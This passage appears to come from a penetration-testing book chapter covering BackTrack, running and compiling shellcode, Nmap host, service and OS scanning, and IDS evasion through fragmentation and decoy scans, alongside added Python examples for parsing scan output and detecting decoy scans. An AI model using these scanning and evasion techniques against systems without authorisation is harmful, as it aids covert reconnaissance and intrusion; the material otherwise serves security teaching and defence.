    # $Id: ms10_061_spoolss.rb 10442 2010-09-23 02:15:40Z jduck $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::DCERPC
        include Msf::Exploit::Remote::SMB
        include Msf::Exploit::EXE

        def initialize(info = {})
            super(update_info(info,
                'Name'        => 'Microsoft Print Spooler Service Impersonation Vulnerability',
                'Description' => %q{
                    This module exploits the RPC service impersonation
                    vulnerability detailed in ...

(the listing is cut off in the screenshot)


Shellcode 


Many of the vulnerabilities come with proofs of concept in the form of shellcode. Shellcode is a 
blanket term for a small amount of code, known as a "payload," used to exploit a vulnerability, whether it is 
contained in scripts or in higher-level language code, which can be written in many different languages 
from Python, Perl, and Ruby to C++. Typically, there are two parts to shellcode: 


1. Exploit: This is what allows the hacker to break into the system. 
2. Payload: This is what allows the hacker to interact with or perform actions on the system; it can 
be as simple as a command prompt, adding and injecting users, or a remote VNC shell. 


Running Shellcode 


If for some reason you find shellcode that you need to execute, all you have to do is find the 
language it runs in (assuming the code is reliable and coded correctly) and identify 
the file extension. Note that the sudo command just makes sure your exploit runs with superuser 
privileges. To make sure everything typed is run as the superuser, you can do a sudo su if you are using a 
Debian/Ubuntu-based hacking platform. 

To execute shellcode: 


■ sudo python ./shellcode.py ← Python uses a .PY extension. 
■ sudo perl ./shellcode.pl ← Perl uses a .PL extension. 
■ sudo ruby ./shellcode.rb ← Ruby uses a .RB extension. 


To compile shellcode: 


■ sudo gcc shellcode.c -o outputfile ← C 
■ sudo g++ shellcode.cpp -o outputfile ← C++ 
Note that in all of these examples you also have to make sure you have the right libraries installed. 
Many exploits depend on a specific set of libraries to call certain functions, classes, methods, and so 
on. The way to install these depends mostly on the code being used and varies greatly. 


BackTrack 


BackTrack is a free pentesting distribution of Linux, more specifically one based on the Ubuntu 
distribution (a Debian fork), which contains many penetration testing and hacking tools packaged 
into one easy-to-use distribution. Therefore, downloading this package will eliminate the hassle 
of compiling a lot of the tools from different sources. BackTrack is available on a Live CD, a Live 
USB disk, and is even available as a virtual machine (VM). This will be the primary attack 
platform throughout the research and attack sections, so go grab a copy. You can download BackTrack 
at http://www.backtrack-linux.org/. BackTrack 5 is the latest version as of May 2011. 


[Screenshot: the BackTrack Linux - Penetration Testing Distribution home page (http://www.backtrack-linux.org/): "Welcome to backtrack-linux.org, home of the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you're making BackTrack your primary system, booting from a LiveDVD, or using your favorite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester." The page adds that BackTrack is intended for all audiences, from seasoned security professionals to newcomers, and that the BackTrack Project is funded by Offensive Security.]

BackTrack is our default platform for hacking tools, as many of the tools used are inside. It is 
recommended that you grab the VM. However, many of these tools are also freely available for 
download from their respective websites. BackTrack 4 will be used in the examples in this chapter. 


BackTrack Tools 


Many of the programs installed in BackTrack are contained in /pentest/. Most can be accessed by 
just going to the Start menu (similar to Windows). Now, back to scanning. This chapter is primar- 
ily based on scanning techniques; however, much of this background information will be used 
throughout the book. 
[Screenshot: the BackTrack start menu, with the tools grouped under Information Gathering, Network Mapping, Vulnerability Identification, Web Application Analysis, Radio Network Analysis, Penetration, Privilege Escalation, Maintaining Access, Digital Forensics, Reverse Engineering, Voice Over IP, and Miscellaneous.]

Notice how the sections are broken up into the various areas of a hacker's methodology 
and/or the varying techniques that hackers try to use. 


BackTrack Scanning 


Many of the tools used to gather intelligence on our targets are located in BackTrack under 
/pentest/scanners (cd /pentest/scanners); also look at the rest of the /pentest directory. In here you will see: 


drwxr-xr-x 2 root root 4.0K Jun 16 2009 5nmp 
drwxr-xr-x 6 root root 4.0K Jun 16 2009 netifera 
drwxr-xr-x 6 root root 4.0K Dec 14 2009 nikto 
drwxr-xr-x 6 root root 4.0K Jun 16 2009 nsat 
drwxr-xr-x 2 root root 4.0K Jun 16 2009 propecia 
drwxr-xr-x 2 root root 4.0K Jun 16 2009 sctpscan 


Windows Emulation in BackTrack 


Also, BackTrack 4 gives the user the ability to use some Windows executables; this is very useful 
for hackers. Hackers can use this ability to help them generate Windows payloads and executables 
to allow them to further retain their access, but most of all they can use Windows-based hacking 
tools as long as they don't have any dependencies outside that of Wine. 


Wine 


Wine (www.winehq.org) allows you to install and run applications in Linux just like you would in 
Windows itself. Wine is open source, freely available software. It is included as a part of BackTrack. 
Wine is especially important if the hacker comes across Windows-based shellcode that he wants 
to code into an executable while in Linux and/or the hacker needs to test some of his payloads/ 
exploits. The default location of Wine on BackTrack is /root/.wine. 
Notice that in this directory we have drive C:. This is the default location of your Windows-based 
Wine environment. 
In order to compile C source under Wine: 


■ sudo winegcc shellcode.c -o outputfile.exe ← C 
■ sudo wineg++ shellcode.cpp -o outputfile.exe ← C++ 


A Table for Wine Commands 


Command     Description 

wine        Executes a Windows binary in the Wine emulator. 
winefile    Windows-style GUI file browser. 
winecfg     Configures Wine through a GUI. 


Many times the hacker will be using Linux as his hacking platform of choice but needs a way to 
compile malware in a way that is executable on Windows victims if need be, and needs to be able 
to test it. 


Information Gathering and Vulnerability Assessment 
Using BackTrack 


By this point, the hacker has gained a lot of indirect recon, and now he has to really start assessing 
and finding vulnerabilities to exploit. This can be a lot of information, so many penetration 
testers and hackers use tools to document their findings. Hackers have to create detailed 
and efficient notes, as this helps them remember and focus on varying areas of attack. Sometimes 
it is recommended just to create a mindmap using tools such as XMind (http://www.xmind.net/ 
downloads/). As part of a team of hackers or penetration testers, it is also important to share this 
information. Otherwise, only the hacker will really know what he has found and not his team. 
Another good tool for information sharing is the Dradis Framework (http://dradisframework.org/), 
which is included in BackTrack. Dradis is an open source framework for information sharing. 


Maltego 


Maltego (http://www.xmind.net/downloads/) is a tool that will gather and coordinate information 
that security researchers use to identify threats to their network. This tool is good for link analysis 
by coordinating the social engineering and indirect intelligence as well as to pair it with more direct 
intelligence scanning techniques. Hackers can use this to break down an organization and identify 
apparent threats and vulnerabilities to help pinpoint the attack. It will map groups of people, com- 
panies, their websites, domains, IP addresses, and even net blocks and much more to see how it is all 
connected. Therefore, using this tool, the hacker may find hidden links and new avenues of attack. 
Notice how we can take a domain, map its net block, map its ports, and map the structure 
of the website. Especially when dealing with so many different leads, Maltego is a great tool for 
managing them and visually seeing how they intertwine. 


Nmap 


Nmap is one of the primary scanning tools used by hackers. It is a free scanning tool and one 
of the best. It is available on all platforms and you can download it at http://www.nmap.org/. 
Nmap stands for Network Mapper and is an open source tool used for gathering direct research 
on hosts, services, vulnerabilities, and version information. The tool was designed 
for network exploration, security auditing, and mapping and exploring networks, and has been 
around since 1997. This tool is perfect for finding information on how to exploit a server. If for 
any reason you forget some of the Nmap commands, just type "nmap" or "man nmap" for some 
examples. 


Zenmap 


Nmap also comes with a GUI command tool known as Zenmap, which is very useful for manag- 
ing your scans and showing the varying options of Nmap without having to remember the varying 
switches. Zenmap gives some preconfigured profiles you can use that are specifically configured 
with various Nmap switches. 
[Screenshot: Zenmap, Nmap Output tab] 

Command: nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 192.168.22.133 

Interesting ports on 192.168.22.133: 
Not shown: 986 closed ports 
PORT     STATE SERVICE      VERSION 
53/tcp   open  domain       Microsoft DNS 
88/tcp   open  tcpwrapped 
135/tcp  open  msrpc        Microsoft Windows RPC 
139/tcp  open  netbios-ssn 
389/tcp  open  ldap 
464/tcp  open  tcpwrapped 
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0 
636/tcp  open  tcpwrapped 
1025/tcp open  msrpc        Microsoft Windows RPC 
1028/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0 
1040/tcp open  msrpc        Microsoft Windows RPC 
1048/tcp open  msrpc        Microsoft Windows RPC 
3268/tcp open  ldap 
3269/tcp open  tcpwrapped 
MAC Address: 00:0C:29:B7:4A:E1 (VMware) 
Device type: general purpose 
Running: Microsoft Windows XP|2003 
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003, Microsoft Windows XP SP2 or SP3 
Network Distance: 1 hop 
TCP Sequence Prediction: Difficulty=263 (Good luck!) 
IP ID Sequence Generation: Incremental 
Service Info: OS: Windows 

Notice this scan gave back a list of ports, the state of the port, the service that is most likely 
running on the port, and lastly the version of the service being run. 


[Screenshot: Zenmap, Host Details tab] 

Host Status 
    State: up 
    Open ports: 14 
    Filtered ports: 0 
    Closed ports: 986 
    Scanned ports: 1000 
    Up time: Not available 
    Last boot: Not available 

Addresses 
    IPv4: 192.168.22.133 
    IPv6: Not available 
    MAC: 00:0C:29:B7:4A:E1 

Operating System 
    Name: Microsoft Windows XP SP2 or SP3 
    Accuracy: 100% 

Ports used 


Zenmap also gives us information from the scan on the host status, such as how many open 
ports there were on the IP address, the MAC address, and what operating system is possibly being used. 
Nmap Scanning for Subnet Ranges (Identifying Hosts) 


Host discovery: 


-sL: List scan—simply list targets to scan. 

-sP: Ping scan—go no further than determining if host is online. 
-PN: Treat all hosts as online—skip host discovery. 
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP to given ports. 


When using Nmap for host discovery, these are the most important options for identifying hosts. 
-sL gives us a list scan that basically just lists the targets it finds; this is good if you want a quick 
and dirty way to see what hosts are up. -sP uses the ping method, which is almost exactly like 
pinging a system via an ICMP echo request. -PN treats all hosts as online; hackers use this option 
because most computers have some type of firewall enabled. Essentially, Nmap runs certain 
fingerprints against services and ports and, depending on the response, can identify if a service is running 
on that port. Nmap allows the use of varying transport layer scanning techniques. The command 
for -PN (treat all hosts as online, skip host discovery) is as follows: 


root@bt:/pentest# nmap -v -PN 192.168.1.1-254 
or 


root@bt:/pentest# nmap -v -PN 192.168.1.0/24 ← Uses CIDR notation too! 


One of the first commands issued is to scan the varying subnets to get an idea of what hosts are 
up. If the hacker is within the network, this is a good way to see how vulnerable you are. 


Host 192.168.22.131 is up (0.00084s latency). 
Interesting ports on 192.168.22.131: 
Not shown: 990 closed ports 
PORT     STATE SERVICE 
22/tcp   open  ssh 
80/tcp   open  http 
110/tcp  open  pop3 
143/tcp  open  imap 
993/tcp  open  imaps 
995/tcp  open  pop3s 
8001/tcp open  unknown 
8002/tcp open  teradataordbms 
8080/tcp open  http-proxy 
9000/tcp open  cslistener 
MAC Address: 00:0C:29:44:48:D9 (VMware) 

Host 192.168.22.254 is up (0.00019s latency). 
All 1000 scanned ports on 192.168.22.254 are filtered 
MAC Address: 00:50:56:F9:81:8E (VMware) 

Read data files from: /usr/share/nmap 
Nmap done: 254 IP addresses (5 hosts up) scanned in 26.14 seconds 
Raw packets sent: 7102 (311.484KB) | Rcvd: 5301 (216.100KB) 


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Here we can see that the whole range was scanned, five hosts were found up, and scanning all 254 
addresses took only 26.14 seconds. Remember that scanning across the Internet, or scanning much 
larger networks, can take far longer. Note that the scan lists the ports that are open on each host 
and the service usually found on each port. Port numbers run from 1 to 65,535, and the fact that 
port 80 is registered for HTTP does not mean a web server has to be running there: the SERVICE 
column is simply the name Nmap looks up for that port number in its nmap-services table, not 
something it verified (that is what -sV does, below). Services can be bound to almost any port, 
and attackers rely on exactly that for their command and control channels: the channel through 
which an attacker sends commands to, and pulls data back from, a host he has compromised. Also, 
while you can often tell which services are running, you may not be able to tell which operating 
system a host runs or what patch level it is at from the port list alone. Still, the mix of open 
ports is a strong hint. Ports such as 22 (SSH), 110 and 143 (POP3 and IMAP) and 9000 on the first 
host suggest a Unix-like server, whereas ports 135-139, 445 and the dynamic RPC ports around 1025 
suggest a Windows host, and 88 (Kerberos), 389 (LDAP) and 3268 (global catalog) point to a Windows 
domain controller. 

One way to keep opportunistic scanners from noticing a sensitive service is to move it to an 
unusual high port. By default Nmap scans only the roughly 1,000 most commonly used ports (its 
top-ports list), not the whole range, and many other tools behave the same way, so a service moved 
to a port such as 39,329 will not appear in a default scan. Therefore, when hardening a server that 
needs remote access such as SSH, moving it to a port like 39,329 removes it from most casual scans 
and from most of the brute-force noise in your logs. Keep in mind, however, that this is obscurity, 
not security: nmap -p- scans all 65,535 ports and will find it, and a patient attacker will spend 
that time. It only makes sense on top of real hardening (key-based authentication, patching, 
firewall rules). Also, if you move a public web site off port 80 or 443, people will not be able to 
reach it without knowing the port number. 
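As an added example (it is not part of the original text and not Nmap's own code), here is a small Python parser for Nmap's greppable output format (-oG), which turns a sweep like the one above into something a defender can diff against an inventory: which hosts answered, which ports are open, and which open ports Nmap could not name (the first candidates for a relocated service or a command and control listener). The sample output is constructed to mirror the scan above rather than captured from those hosts, and the function names and the inventory set are ours.

```python
import re

# Constructed sample of `nmap -v -PN -oG -` output modelled on the sweep above
# (not a real capture). Each host gets a Status line and, when ports were
# found, a Ports line; a host whose ports were all filtered has no Ports line.
SAMPLE_GREPPABLE = """\
# Nmap 5.21 scan initiated as: nmap -v -PN -oG - 192.168.22.0/24
Host: 192.168.22.131 ()\tStatus: Up
Host: 192.168.22.131 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 143/open/tcp//imap///, 8001/open/tcp//unknown///, 9000/open/tcp//cslistener///\tIgnored State: closed (995)
Host: 192.168.22.254 ()\tStatus: Up
Host: 192.168.22.254 ()\tIgnored State: filtered (1000)
# Nmap done -- 254 IP addresses (2 hosts up) scanned in 26.14 seconds
"""

# One entry of the Ports: field: port/state/protocol/owner/service/rpc/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)///")


def parse_greppable(text):
    """Return {ip: {"up": bool, "ports": [(port, proto, service, state), ...]}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment and blank lines
        fields = line.split("\t")
        ip = fields[0].split()[1]
        entry = hosts.setdefault(ip, {"up": False, "ports": []})
        for field in fields[1:]:
            if field.startswith("Status:"):
                entry["up"] = field.split(":", 1)[1].strip() == "Up"
            elif field.startswith("Ports:"):
                for num, state, proto, svc in PORT_RE.findall(field):
                    entry["ports"].append((int(num), proto, svc or "unknown", state))
    return hosts


def hosts_up(hosts):
    return sorted(ip for ip, e in hosts.items() if e["up"])


def open_ports(hosts, ip):
    entry = hosts.get(ip, {"ports": []})
    return sorted(p for p, _, _, state in entry["ports"] if state == "open")


def unknown_services(hosts, ip):
    """Open ports Nmap could not name from nmap-services: the likeliest places for a
    relocated service or a command-and-control listener, and the first to probe with -sV."""
    entry = hosts.get(ip, {"ports": []})
    return sorted(p for p, _, svc, state in entry["ports"]
                  if state == "open" and svc == "unknown")


def unexpected_hosts(hosts, inventory):
    """Hosts that answered the sweep but are missing from the defender's inventory."""
    return sorted(ip for ip in hosts_up(hosts) if ip not in inventory)


if __name__ == "__main__":
    parsed = parse_greppable(SAMPLE_GREPPABLE)
    for ip in hosts_up(parsed):
        print(ip, "open:", open_ports(parsed, ip), "unnamed:", unknown_services(parsed, ip))
    # Constructed inventory: only the gateway is "known", so the server shows up as unexpected.
    print("not in inventory:", unexpected_hosts(parsed, {"192.168.22.254"}))
```

Run the real thing with `nmap -v -PN -oG sweep.gnmap 192.168.22.0/24` and feed the file to `parse_greppable`; scheduling the sweep and diffing its output against the previous run is the cheapest way to notice a new host or a new listener on your own network.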


Nmap Scanning for Subnet Ranges (Identifying Services) 


Once we have identified the hosts in the range we want to target, the next step is to identify the 
services on each host, the operating system it runs and the versions of those services, because the 
version is what tells an attacker which known vulnerabilities apply. Therefore it is important to 
do operating system detection. To do so, add the -O switch to your Nmap scan; it works best when the 
target has at least one open and one closed TCP port for Nmap to probe. 

Attackers can also control how far the TCP handshake is carried through, using several options. 
The -sS switch is a TCP SYN scan, also known as a TCP "half-open" scan: the scanner sends a SYN 
packet to the victim, and if the port is open the victim answers with SYN/ACK, the second step of 
the three-way handshake; if the port is closed it answers with RST, and if a firewall drops the 
probe nothing comes back at all (Nmap then reports the port as filtered). Nmap never sends the final 
ACK, so the connection is never completed and many applications never log it. The -sT option 
performs the full three-way handshake through the operating system's connect() call; it needs no 
raw-socket privileges, but the service sees a completed connection and is far more likely to log 
it. Lastly, the -sA option sends packets with only the ACK flag set. This scan does not distinguish 
open from closed ports; it is designed to map firewall filtering rules and access control lists: if 
an ACK is sent and an RST comes back, the port is "unfiltered", meaning the rules let the packet 
through to the host, whereas silence or an ICMP unreachable message means a stateful firewall or 
ACL is blocking it. 

Examples of how nmap can be used in this situation include: 


root@bt:/pentest# nmap -v -sS -O 192.168.22.132   <-- half-open (SYN) scan 
root@bt:/pentest# nmap -v -sT -O 192.168.22.132   <-- full three-way handshake (connect) scan 
root@bt:/pentest# nmap -v -sA -O 192.168.22.132   <-- ACK scan (firewall rule mapping) 


Output: 


Interesting ports on 192.168.22.132: 
Not shown: 984 closed ports 
PORT     STATE SERVICE 
53/tcp   open  domain 
88/tcp   open  kerberos-sec 
135/tcp  open  msrpc 
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139/tcp  open  netbios-ssn 
389/tcp  open  ldap 
445/tcp  open  microsoft-ds 
464/tcp  open  kpasswd5 
593/tcp  open  http-rpc-epmap 
636/tcp  open  ldapssl 
1025/tcp open  NFS-or-IIS 
1026/tcp open  LSA-or-nterm 
1028/tcp open  unknown 
1038/tcp open  unknown 
1049/tcp open  unknown 
3268/tcp open  globalcatLDAP 
3269/tcp open  globalcatLDAPssl 
MAC Address: 00:0C:29:C7:A7:B6 
Device type: general purpose 
Running: Microsoft Windows XP|2003 
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003, 
            Microsoft Windows XP SP2 or SP3 
Network Distance: 1 hop 
TCP Sequence Prediction: Difficulty=262 (Good luck!) 
IP ID Sequence Generation: Incremental 


Note that this scan gives us the list of open ports with their usual services, and from the TCP/IP 
stack fingerprint Nmap concludes that the host is Windows XP SP2 or Windows Server 2003, but it 
cannot decide between them. This matters because many exploits only work against the exact OS and 
service pack, since return addresses and offsets differ between builds. Here the open ports tell us 
more than the fingerprint does: Kerberos (88), LDAP (389 and 636), kpasswd (464) and the global 
catalog ports (3268 and 3269) are only open on an Active Directory domain controller, which XP 
cannot be, so this is a Windows Server 2003 machine. 


Nmap Scanning for Subnet Ranges (Identifying Versions) 


Notice in this example that the -sV option gives a good idea of which service is actually running 
on each port and what version it is, by connecting to the port and matching the banner or protocol 
response against Nmap's nmap-service-probes database. This is what the attacker most wants, because 
it turns a port number into a product name and version that can be looked up for known, exploitable 
bugs. 

The command for "-sV: Probe open ports to determine service/version info" is as follows: 

root@bt:/pentest# nmap -v -sV 192.168.22.132 


PORT     STATE SERVICE      VERSION 
53/tcp   open  domain       Microsoft DNS 
88/tcp   open  kerberos-sec Microsoft Windows kerberos-sec 
135/tcp  open  msrpc        Microsoft Windows RPC 
139/tcp  open  netbios-ssn 
389/tcp  open  ldap 
445/tcp  open  microsoft-ds Microsoft Windows 2003 microsoft-ds 
464/tcp  open  kpasswd5? 
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0 
636/tcp  open  tcpwrapped 
1025/tcp open  msrpc        Microsoft Windows RPC 
1026/tcp open  msrpc        Microsoft Windows RPC 
1028/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0 
1038/tcp open  msrpc        Microsoft Windows RPC 
1049/tcp open  msrpc        Microsoft Windows RPC 

Two conventions in this output are worth knowing. A question mark after a service name (kpasswd5?) 
means Nmap is guessing from the port number because no probe matched; "tcpwrapped" means the port 
accepted the connection and then closed it without sending anything, which is typical of a service 
behind an access control wrapper or one that expects a TLS handshake first. Note also that 445 now 
says "Microsoft Windows 2003", settling the question -O left open. 
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Nmap Scanning Firewall/IDS Evasion 


Nmap is a very powerful tool for fingerprinting services and version information, but it is also a 
noisy one: the volume of abnormal traffic it sends is easily picked up by firewalls and intrusion 
detection systems (IDSs). Therefore the attacker has several methods at his disposal to reduce the 
chance of being detected. 

The -f option tells Nmap to split each probe into tiny IP fragments: the TCP header (normally 20 
bytes) is carried in 8-byte fragments, and --mtu lets you choose a different fragment size, which 
must be a multiple of 8 because the IP fragment offset field counts 8-byte units. Only the first 
fragment contains the port numbers and sequence number; the TCP flags byte, which is what a simple 
packet filter or signature uses to recognize a SYN probe, lands in the second fragment. The 
technique works against filters and sensors that judge each packet on its own, because the 
destination host reassembles the fragments before handing the segment to TCP, while a sensor that 
does not reassemble only ever sees harmless-looking slivers and lets them pass as normal traffic. 
(MTU normally means the maximum transmission unit of a link; Nmap borrows the name for its fragment 
size.) However, most modern firewalls and IDSs do reassemble: Snort's frag3 preprocessor, for 
example, rebuilds fragmented datagrams before its rules are applied, and many firewalls simply drop 
fragments too small to hold a complete transport header, so fragmentation is far less effective 
than it once was. 

Firewall and intrusion detection system evasion options: 

  -f; --mtu <val>: fragment packets (optionally with the given fragment size) 
  -D <decoy1,decoy2[,ME],...>: cloak a scan with decoys 

This is an example of an Nmap command that will allow an attacker to evade some detection 
mechanisms: 

root@bt:/pentest# nmap -v -sV -O -f --mtu 16 192.168.22.132 


[Screenshot: Wireshark capture on eth0 during the fragmented scan, showing runs of "Fragmented IP 
protocol" packets from 192.168.22.130 to 192.168.22.132 followed by the reassembled probe to port 
53 (domain); the status bar reports 3341 packets captured.] 


Notice that this scan generated over 3,000 packets just to fingerprint one single host, and the 
fragmentation only multiplies the packet count. From a packet standpoint this is very noisy and 
would be easily caught by a properly tuned IDS, or even by plain flow records: when is it normal for 
one host to send more than 3,000 packets, most of them fragments, to a single neighbour in under a 
minute? 
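As an added illustration (not from the original text and not Nmap's source code), the following Python models why tiny fragments defeat a per-packet filter and why a reassembling sensor such as Snort's frag3 sees through them. It builds a constructed 20-byte TCP SYN header like the probe to port 53 in the capture, splits it the way -f and --mtu do, shows that no single fragment exposes the SYN flag, and then reassembles the pieces in arbitrary order. The function names are ours, and the model leaves out the IP header and identification field that real fragments also carry.

```python
import random
import struct

# Constructed 20-byte TCP SYN header (source port from the capture above, sequence
# number made up, checksum left as zero for the demo).
def tcp_syn_header(sport=53075, dport=53, seq=1762537):
    # !HHIIBBHHH = src port, dst port, seq, ack, data offset, flags, window, checksum, urgent
    return struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 1024, 0, 0)


def fragment(segment, mtu=8):
    """Split a transport segment the way `nmap -f` / `--mtu <val>` does: fixed-size pieces
    whose size is a multiple of 8, because the IP fragment offset field counts 8-byte units.
    Returns [{"offset": units, "mf": more-fragments flag, "data": bytes}, ...]."""
    if mtu < 8 or mtu % 8:
        raise ValueError("fragment size must be a positive multiple of 8")
    frags = []
    for start in range(0, len(segment), mtu):
        chunk = segment[start:start + mtu]
        frags.append({"offset": start // 8, "mf": start + mtu < len(segment), "data": chunk})
    return frags


def syn_flag_visible(frag):
    """What a per-packet filter sees: the TCP flags byte sits at offset 13, so it is only
    present in a fragment that starts at offset 0 and carries at least 14 bytes."""
    return frag["offset"] == 0 and len(frag["data"]) >= 14 and bool(frag["data"][13] & 0x02)


def reassemble(frags):
    """What the destination host (or Snort's frag3 preprocessor) does: order by offset,
    require contiguity, and wait for the fragment with MF clear before inspecting."""
    ordered = sorted(frags, key=lambda f: f["offset"])
    buf = bytearray()
    for f in ordered:
        if f["offset"] * 8 != len(buf):
            return None  # gap or overlap: incomplete, cannot inspect yet
        buf += f["data"]
    if not ordered or ordered[-1]["mf"]:
        return None  # last piece still missing
    return bytes(buf)


if __name__ == "__main__":
    hdr = tcp_syn_header()
    pieces = fragment(hdr, 8)          # -f: three fragments of 8, 8 and 4 bytes
    random.shuffle(pieces)             # fragments may arrive in any order
    print("per-packet filter sees SYN:", any(syn_flag_visible(p) for p in pieces))
    whole = reassemble(pieces)
    print("after reassembly sees SYN:", whole == hdr and bool(whole[13] & 0x02))
```

With --mtu 16 the first fragment is 16 bytes long and already contains the flags byte, so only the default 8-byte fragments actually hide the SYN; that is why the 16-byte setting in the command above buys little against a flags-based filter and nothing against a reassembling one.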
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Nmap Scanning Decoys 


-S lets you spoof the source IP address, but it is extremely important to note that you cannot 
spoof another address and still receive the victim's responses: they go to the spoofed address. So 
-S on its own is only useful to an attacker who wants to fill up logs or throw suspicion on someone 
else. That is where the -D option is helpful, because it lets you cloak a scan using decoys: Nmap 
sends every probe once from the real address and once from each decoy address, so the target and 
its logs see the same scan arriving from several sources and cannot tell which one is real. You 
designate a comma-separated pool of decoys (no spaces) and then the host you want to scan; the 
token ME can be placed in the list to control where the real address falls in the sequence. 
Here is an example command: 

root@bt:/pentest# nmap -v -sS -D 192.168.1.3,192.68.1.43 192.168.22.132 

Decoy addresses: 
  192.168.1.3 
  192.68.1.43 

Scanning address: 
  192.168.22.132 

This command sends three packets per probe: one from each of the two decoys plus one from the real 
scanning host. Why would an attacker want to do this? He can designate as many decoys as he wants, 
and the more he uses, the harder it becomes to pinpoint where the scan really originates. If 
during the scan and attack he hides his address among many foreign addresses, it becomes very 
difficult to locate him; not only does this confuse investigators, it also quickly fills up logs 
and makes them much harder to analyse. In the earlier example a scan of a single host generated 
almost 3,000 packets; with two decoys plus the real host that becomes 3,000 x 3, over 9,000 
packets. Note, too, that the decoys should be hosts that are actually up: if only one of the 
"sources" is alive it is easy to tell which one is scanning, and SYN/ACKs sent to dead decoys can 
amount to a SYN flood of the target. 


[Screenshot: Wireshark capture during the decoy scan. Frame 33 is a reply from the target 
192.168.22.132 (MAC 00:0c:29:c7:a7:b6), source port 1723 (pptp), sent to 192.168.1.2, a decoy 
address: the target answers the decoy exactly as it answers the real scanner. The status bar 
reports 3178 packets captured.] 
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The option "--randomize-hosts (Randomize target host order)" makes Nmap shuffle each group of up 
to 16,384 target hosts before scanning them, so the addresses are not hit in incrementing order. 
That makes a sweep much less obvious to a sensor that keys on one source walking sequentially 
through a subnet, and it combines well with slow timing and decoys. 

There are not many reliable ways to detect decoy Nmap scans, but if the scan comes from inside the 
network, defenders can at least compare MAC addresses with IP addresses. The decoy probes carry 
different source IPs, but when they are sent on the local segment they all leave the scanner's 
network card and therefore share its MAC address; a genuine host scanning you would use its own 
MAC. Two further tells: the real scanner is the only one of those addresses whose stack answers the 
target's SYN/ACKs with an RST, and decoys that are not on the local subnet never generate ARP 
traffic. None of this helps across a router, where every external address arrives with the 
router's MAC. Since decoy scans are also designed to fill your logs, make sure you raise log sizes 
and retention well above the defaults (at least three times the default) so that a scan cannot push 
the evidence out of the logs. 
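The MAC-versus-IP check described above, as an added example that is not part of the original text: a few lines of Python run over constructed capture records (modelled on the decoy scan, with the scanner's MAC taken from the ARP frame in the earlier Wireshark dump; this is not a real pcap). It groups SYNs by source MAC, flags any MAC that claims more than one source IP, excludes gateway MACs that legitimately forward many sources, and picks the real scanner as the address that answered the target's SYN/ACK with an RST. The record format and function names are ours.

```python
from collections import defaultdict

# Constructed capture records, not a real pcap: scanner 192.168.22.130 with decoys
# 192.168.1.3 and 192.68.1.43 against 192.168.22.132, plus routed traffic via the gateway.
# Tuple: (frame, src_mac, src_ip, dst_ip, dst_port, tcp_flags)
SAMPLE_FRAMES = [
    (1,  "00:0c:29:93:25:c1", "192.168.1.3",    "192.168.22.132", 22,  "S"),
    (2,  "00:0c:29:93:25:c1", "192.168.22.130", "192.168.22.132", 22,  "S"),
    (3,  "00:0c:29:93:25:c1", "192.68.1.43",    "192.168.22.132", 22,  "S"),
    (4,  "00:0c:29:c7:a7:b6", "192.168.22.132", "192.168.1.3",    22,  "SA"),  # target answers every "source"
    (5,  "00:0c:29:c7:a7:b6", "192.168.22.132", "192.168.22.130", 22,  "SA"),
    (6,  "00:0c:29:c7:a7:b6", "192.168.22.132", "192.68.1.43",    22,  "SA"),
    (7,  "00:0c:29:93:25:c1", "192.168.22.130", "192.168.22.132", 22,  "R"),   # only the real host's stack tears down
    (8,  "00:0c:29:93:25:c1", "192.168.1.3",    "192.168.22.132", 445, "S"),
    (9,  "00:0c:29:93:25:c1", "192.168.22.130", "192.168.22.132", 445, "S"),
    (10, "00:0c:29:93:25:c1", "192.68.1.43",    "192.168.22.132", 445, "S"),
    # Two different external clients arriving through the gateway's MAC: normal, not a decoy scan.
    (11, "00:50:56:f9:81:8e", "10.0.0.5",       "192.168.22.132", 80,  "S"),
    (12, "00:50:56:f9:81:8e", "10.0.0.9",       "192.168.22.132", 80,  "S"),
]


def syn_sources_by_mac(frames):
    """Map each source MAC to the set of source IPs it has sent SYNs from."""
    by_mac = defaultdict(set)
    for _, mac, sip, _, _, flags in frames:
        if flags == "S":
            by_mac[mac].add(sip)
    return by_mac


def detect_decoy_scans(frames, gateway_macs=frozenset()):
    """A single MAC on the local segment claiming several source IPs is a decoy scan.
    Gateways legitimately forward many sources behind one MAC, so they are excluded."""
    return {mac: sorted(ips) for mac, ips in syn_sources_by_mac(frames).items()
            if mac not in gateway_macs and len(ips) > 1}


def likely_true_source(frames, mac, claimed_ips):
    """Of the IPs a scanning MAC claims, the real one is the one whose kernel replies to the
    target's SYN/ACK with an RST (a raw-socket SYN scan leaves that to the OS); decoy
    addresses never answer. Returns None if no such RST was observed."""
    for _, m, sip, _, _, flags in frames:
        if m == mac and flags == "R" and sip in claimed_ips:
            return sip
    return None


if __name__ == "__main__":
    found = detect_decoy_scans(SAMPLE_FRAMES, gateway_macs={"00:50:56:f9:81:8e"})
    for mac, ips in found.items():
        real = likely_true_source(SAMPLE_FRAMES, mac, ips)
        print(f"{mac} sent SYNs as {ips}; likely real source: {real}")
```

In practice the records come from `tshark -r capture.pcap -T fields -e eth.src -e ip.src -e ip.dst -e tcp.dstport -e tcp.flags` or from a span-port sensor; the gateway exclusion is what keeps the rule from firing on every router in the building.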


Nmap Randomization and Speed 


Nmap is not a stealthy tool by default and creates an extreme amount of noise on the network. An 
